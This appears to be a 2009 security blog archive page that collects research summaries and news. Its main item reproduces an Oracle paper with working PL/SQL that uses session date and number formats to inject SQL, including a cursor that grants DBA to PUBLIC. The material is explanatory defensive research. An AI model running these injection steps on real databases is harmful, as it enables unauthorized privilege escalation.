Archive for June, 2009

Join us at Hackintosh - INDIA 2009 !!! This is a great networking opportunity for the ethical hackers and security enthusiasts across the country with intense knowledge sharing sessions, demonstrations and hands on experience on the latest tools and technologies that enables you to discover and contribute to make the world a SECURE place to live in.

Hackintosh - INDIA 2009 is its first kind of event with “capture the flag” concept. “Capture the Flag”, the security hacking game is specially designed on Day 2 forming teams of experienced ethical hackers and security professionals from the attendees to mock the attackers and hackers in the security battlefield. Join us for the true digital experience real time, Once again,We cordially invite you to be part of “Hackintosh INDIA 09″ journey and win exciting surprise goodies!

Please check the invite

Hackintosh - INDIA 2009

◄ Back

Next ►

Picture 1 of 1

Hackintosh - INDIA 2009 is its first kind of event with “capture the flag” concept. “Capture the Flag”, the security hacking game is specially designed on Day 2 forming teams of experienced hackers and security professionals from the attendees to mock the attackers and hackers in the security battlefield. Join us for the true digital experience real time, Once again,We cordially invite you to be part of “Hacintosh INDIA 09″ journey and win exciting surprise goodies!

The Event is over,for any more information,please fill in the form below

Contrary to popular assumption, DRAMs used in most modern computers retain their contents for seconds to minutes after power is lost, even at operating temperatures and even if removed from a motherboard. Although DRAMs become less reliable when they are not refreshed, they are not immediately erased, and their contents persist sufficiently for malicious (or forensic) acquisition of usable full-system memory images. We show that this phenomenon limits the ability of an operating system to protect cryptographic key material from an attacker with physical access. We use cold reboots to mount attacks on popular disk encryption systems BitLocker, FileVault, dm-crypt, and TrueCrypt using no special devices or materials. We experimentally characterize the extent and predictability of memory remanence and report that remanence times can be increased dramatically with simple techniques. We offer new algorithms for finding cryptographic keys in memory images and for correcting errors caused by bit decay. Though we discuss several strategies for partially mitigating these risks, we know of no simple remedy that would eliminate them.

How can an attacker exploit a PL/SQL procedure that doesn’t even take user input? Or how does one do SQL injection using DATE or even NUMBER data types? In the past this has not been possible but as this paper will demonstrate, with a little bit of trickery, you can in the Oracle RDBMS. Consider the following code for a PL/SQL procedure:
create or replace procedure date_proc is
stmt varchar2(200);
v_date date:=sysdate;
begin
stmt:=’select object_name from all_objects where created = ”’ ||
v_date || ””;
dbms_output.put_line(stmt);
execute immediate stmt;
end;
/

It takes no parameters and so typically would not be audited. That said, we can see that the V_DATE variable is embedded within an SQL query which is then dynamically executed via the EXECUTE IMMEDIATE statement. Tracing back through the code we see that value for V_DATE is assigned from a call to the SYSDATE() built in function. If this were somehow influenceable then an attacker could potentially inject arbitrary SQL. As we will see this is fully exploitable but first let’s consider this code:
create or replace procedure date_proc_2(p_date) is
stmt varchar2(200);
begin
stmt:=’select object_name from all_objects where created = ”’ ||
p_date || ””;
dbms_output.put_line(stmt);
execute immediate stmt;
end;
/

The code here is similar to the code of the first procedure except this time the date is passed as a DATE type parameter. As DATE parameters are thought of as “safe” this procedure would probably not be audited. If we try to perform a typical SQL injection attack here, it fails because the parameter is a DATE and not a VARCHAR:
SQL> exec date_proc_2(”’ and scott.getdba()=1–’);
BEGIN date_proc(”’ and scott.getdba()=1–’); END;
ERROR at line 1:
ORA-01841: (full) year must be between -4713 and +9999, and not be 0
ORA-06512: at line 1

To exploit DATE_PROC_2 we need to trick the PL/SQL compiler into accepting our arbitrary SQL as a DATE even though it’s not. This is easy to do if you have the ALTER SESSION privilege:
SQL> ALTER SESSION SET NLS_DATE_FORMAT = ‘”” and scott.getdba()=1–”‘;
Session altered.
SQL> exec date_proc_2(”’ and scott.getdba()=1–’);
*
ERROR at line 1:
ORA-00904: “SCOTT”.”GETDBA”: invalid identifier
ORA-06512: at “SYS.DATE_PROC_2″, line 5
ORA-06512: at line 1

If we look at the error here we can see that the error has been generated from the DATE_PROC_2 function: it has tried to execute the SCOTT.GETDBA function which just happens not to exist and thus we get the error. However, all the attacker need now do to complete the attack is create the SCOTT.GETDBA function and execute the procedure again or alternatively use a cursor injection attack as described here: http://www.databasesecurity.com/dbsec/cursor-injection.pdf. Of course, David could’ve built the procedure first; But he chose not to simply to show the error. Now let’s return to our first procedure, DATE_PROC. Recall that it takes no parameters but a variable, V_DATE, the result of a call to the SYSDATE function is embedded in an SQL query then executed. Look what happens when the SYSDATE function is executed:
SQL> ALTER SESSION SET NLS_DATE_FORMAT = ‘”THIS IS A SINGLE QUOTE ””‘;
Session altered.
SQL> SELECT SYSDATE FROM DUAL;
SYSDATE
————————
THIS IS A SINGLE QUOTE ‘
Thus if we now execute the DATE_PROC function this should generate an unclosed
quotation mark error:
SQL> EXEC DATE_PROC();
BEGIN DATE_PRC(); END;
*
ERROR at line 1:
ORA-01756: quoted string not properly terminated
ORA-06512: at “SYS.DATE_PRC”, line 7
ORA-06512: at line 1
And to exploit we can inject a cursor:
SQL> SET SERVEROUTPUT ON
SQL> DECLARE
2 N NUMBER;
3 BEGIN
4 N:=DBMS_SQL.OPEN_CURSOR();
5 DBMS_SQL.PARSE(N,’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN
EXECUTE IMMEDIATE ”GRANT DBA TO PUBLIC”; END;’,0);
6 DBMS_OUTPUT.PUT_LINE(’Cursor is: ‘|| N);
7 END;
8 /
Cursor is: 4
PL/SQL procedure successfully completed.
SQL> ALTER SESSION SET NLS_DATE_FORMAT = ‘”” AND
DBMS_SQL.EXECUTE(4)=1–”‘;
Session altered.
SQL> EXEC DATE_PROC();
select object_name from all_objects where CREATED = ” AND
DBMS_SQL.EXECUTE(4)=1–’
PL/SQL procedure successfully completed.

Thus we can see it’s possible to do two things. Firstly an attacker can pass off arbitrary SQL as a DATE type parameter; secondly an attacker can laterally influence the SYSDATE function using ALTER SESSION and exploit procedures and functions that don’t even take direct user input. As a final point of interest it must be noted that NUMBER type data can be manipulated to contain single quotes:
create procedure num_proc(n number) is
stmt varchar2(2000);
begin
stmt:=’select object_name from all_objects where object_id = ‘ || n;
execute immediate stmt;
end;
/
SQL> ALTER SESSION SET NLS_NUMERIC_CHARACTERS = ”’.’ ;
SQL> SELECT TO_NUMBER( 100000.10001, ‘999999D99999′) FROM DUAL;
TO_NUMBER(100000.10001,’999999D99999′)
————————————–
100000′1
SQL> exec num_proc(TO_NUMBER( 100000.10001, ‘999999D99999′));
BEGIN num_proc(TO_NUMBER( 100000.10001, ‘999999D99999′)); END;
*
ERROR at line 1:
ORA-01756: quoted string not properly terminated
ORA-06512: at “SYS.NUM_PROC”, line 5
ORA-06512: at line 1

Now, whether this becomes “exploitable” in the “normal” sense, David doubts it… but in very specific and limited scenarios there may be scope for abuse, for example in cursor snarfing attacks - http://www.databasesecurity.com/dbsec/cursor-snarfing.pdf. In conclusion, even those functions and procedures that don’t take user input can be exploited if SYSDATE is used. The lesson here is always, always validate and don’t let this type of vulnerability get into your code. The second lesson is that no longer should DATE or NUMBER data types be considered as safe and not useful as injection vectors:
as this paper has proved, they are.

Introduction:
In our earlier “ZyXEL Gateways Vulnerability Research” paper[1], we introduced a new technique: SNMP injection a.k.a. persistent HTML injection via SNMP. Such a technique allowed us to cause a persistent HTML injection condition on the web management console of several ZyXEL Prestige router models.

Provided that an attacker has guessed or cracked the write SNMP community string of a device, he/she would be able to inject malicious code into the administrative web interface by changing the values of OIDs (SNMP MIB objects) that are printed on HTML pages.

The purpose behind injecting malicious code into the web console via SNMP is to fully compromise the device once the page containing the payload is viewed by the administrator.

When we came up with the SNMP injection technique, we suspected that such an attack is possible on a large number of embedded devices in use in the market, as mentioned on some interviews where our research was featured[2]. Although the SNMP write community string must be guessed or cracked for this attack to work, it is worth mentioning that some devices come with SNMP read/write access enabled by default using common community strings[3] such as ‘public’, ‘private’, ‘write’ and ‘cable-docsis’. Some examples include ZyXEL Prestige router models used in residential and SOHO networks, Innomedia VoIP gateways[4], some Cisco routers and phone gateways[5] and other corporate products such as the Proxim Tsunami devices.

Also, the use of customized but weak SNMP write community strings, and other weaknesses within the devices SNMP stack implementation should be taken into account when evaluating the feasibility of this attack.

In order to confirm that this attack affects most SNMP-enabled embedded devices regardless of model or vendor, we surveyed random embedded devices that were available in our computer security lab. Overall, we surveyed network devices from the following vendors:
- Cisco
- Proxim
- 3Com
- ZyXEL

References:
[1] “ZyXEL Gateways Vulnerability Research” http://www.procheckup.com/Hacking_ZyXEL_Gateways.pdf
[2] “SNMP Joins Dark Side in New XSS Attack” http://www.darkreading.com/document.asp?doc_id=147014
[3] “Multiple Vendor SNMP World Writeable Community Vulnerability”
[4] “Digging into SNMP in 2007 An Exercise on Breaking Networks” http://www.ernw.de/content/e7/e181/e671/download690/ERNW_026_SNMP_HitB_Dubai_2007_ger.pdf
[5] “Cisco Security Advisory: DOCSIS Read-Write Community String Enabled in Non-DOCSIS Platforms”

Introduction:
Under the Windows platform, library injection techniques both local and remote have been around for many years. Remote library injection as an exploitation technique was introduced in 2004 by Skape and JT[1]. Their technique employs shellcode to patch the host processes ntdll library at run time and forces the native Windows loader to load a Dynamic Link Library (DLL) image from memory. As an alternative to this technique Stephen presents Reflective DLL Injection.

Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host. Previous work in the security field of building PE file loaders include the bo2k server by DilDog[2].

The main advantage of the library loading itself is that it is not registered in any way with the host system and as a result is largely undetectable at both a system and process level. When employed as an exploitation technique, Reflective DLL Injection requires a minimal amount of shellcode, further reducing its detection footprint against host and network based intrusion detection and prevention systems.

The purpose of this paper is to outline the security measures being taken by vendors to prevent such attacks in their home routing products, what those security measures accomplish, and where they fall short. We will use existing network tools to examine common vulnerabilities in a range of popular devices and demonstrate weaknesses in the security of those devices; additionally, we will examine common trends in security measures that have been duplicated across vendors, and examine how those trends help and hinder the security of their devices. In particular, we will examine the following home routers, which are some of the latest offerings from their respective vendors at the time of this writing:
* Linksys WRT160N
* D-Link DIR-615
* Belkin F5D8233-4v3
* ActionTec MI424-WR

Conclusion:
Router manufacturers are increasing the security of their devices, however, home router security still has a long road ahead of it. Below is a table listing each of the devices and their associated, reasonably exploitable, vulnerabilities mentioned in this paper; these types of vulnerabilities must be considered by all vendors, and should be investigated by any consumer before purchasing a router.

Credit:
The information has been provided by SourceSec DevTeam.
The original article can be found at: http://www.sourcesec.com/Lab/soho_router_report.pdf

Due to ingrained security mechanism in PDF Reader, it is hard to launch certain attacks. But with this technique an attacker can steal generic information from website by executing the code directly in the context of the domain where it is uploaded. The attack surface can be diversified by randomizing the attack vector. On further analysis it has been observed that it is possible to trigger phishing attacks too. Successful attacks have been conducted on number of web applications mainly to extract information based on DOM objects. The paper exposes a differential behavior of Acro JS and Brower JavaScript.

Vendor Response:
The security is implemented mainly for cross domain calls. A check is produced when ever a third party URL is contacted. These restrictions work fine. But our analysis proves that Adobe JavaScript model can be used to test web applications (enterprise) through this attack vector.

Adobe stated “Our position is that, like an HTML page, a PDF file is active content.”

It is right because for JavaScript working the object should be treated as dynamic. But our aim is to demonstrate that the interdependency factor among different software s can raise security concern.

Credit:
The information has been provided by Aditya K Sood.
The original article can be found at: http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf

Three major software companies issued updates this week, with Microsoft fixing 31 vulnerabilities in its operating system and applications, Adobe patching more than a dozen issues in its document reader software, and Apple closing over 50 serious security holes in its Safari browser.

With ten patches, Microsoft fixed more than two dozen flaws, including ten vulnerabilities voided by a trio of patches. The flaws are rated Critical by Microsoft only for Office 2000 and rated Important for other versions of the productivity program. Perhaps the most serious vulnerabilities fixed by the software giant are seven security issues in the company’s flagship browser, Internet Explorer 8, said Andrew Storms, director of security operations for network protection firm nCircle.

“Topping this month’s moderately large release cycle from Microsoft is the critical IE update that  affects even Microsoft’s latest and most secure browser, IE 8,” Storms said in a statement sent to SecurityFocus. “Client side, browser based vulnerabilities continue to top the charts for threats, so every user should put this patch at the top of their ‘install immediately’ list.”

In its first quarterly patch, Adobe shuttered 13 security holes in Adobe Acrobat and Reader. The quarterly patch, which Adobe announced last month, is scheduled to fall on the same day as Microsoft’s Patch Tuesday. Some of the flaws could allow an attacker to run code on the vulnerable system, while others appear to only be denial-of-service issues.

Adobe still needs to work out the kinks in its quarterly patch process, Storms said.

“While the scheduled release cycle for Adobe updates is a big improvement in helping enterprise security teams effectively manage resources, today’s security bulletins are still missing information,” Storms said in a statement. “Security managers need Adobe to step up and provide mitigation steps and more detail on both the bugs and the patches.”

Apple rounded out the patch parade with an update, released on Monday, that fixed more than 50 flaws in its latest browser, Safari 4.

The drive-by-download threat, Grumblar, continues to cause widespread infection, through the number of Web sites compromised with the malicious code appears to have declined since late May, according to Web security firm Websense.

The multi-stage threat, which first compromises Web sites to install malicious code that is then used to infect visitors’ PCs, rocketed eight-fold in mid-May, according to an update posted to Websense’s research blog on Friday. Attackers use stolen FTP credentials to embed the first stage of the attack on legitimate Web sites.

Gary Warner, a professor of digital forensics at the University of Alabama, document an investigation he and his students performed on a compromised Facebook group. The group, which boasted 40,000 members, contained a link to a malicious site that attempted to infect visitors with Grumblar.

“Their (site’s transfer) logs indicated that the malicious content was uploaded to their server by a visitor from the Ukraine, who had logged in using their webmaster’s correct userid and password,” wrote Warner. “It wasn’t a poorly chosen password, and it wasn’t brute forced. They logged in successfully on the first try, indicating that their webmaster probably had a keylogger running on his home computer. In other words, the webmaster’s FTP password was known to the criminals.”

The attacks, dubbed “Grumblar” for the name of the site in China to which visitors were originally redirected, was first detected in March, spiked in mid-May, and has since declined.

A malicious PDF file uploaded to victim’s systems by Grumblar contains the phrase, “Boris likes horilka,” according to Warner’s blog. Horilka is the Ukrainian word for vodka. The software steals FTP credentials, sends spam, installs fake antivirus software, hijacks Google search queries, and disables security software.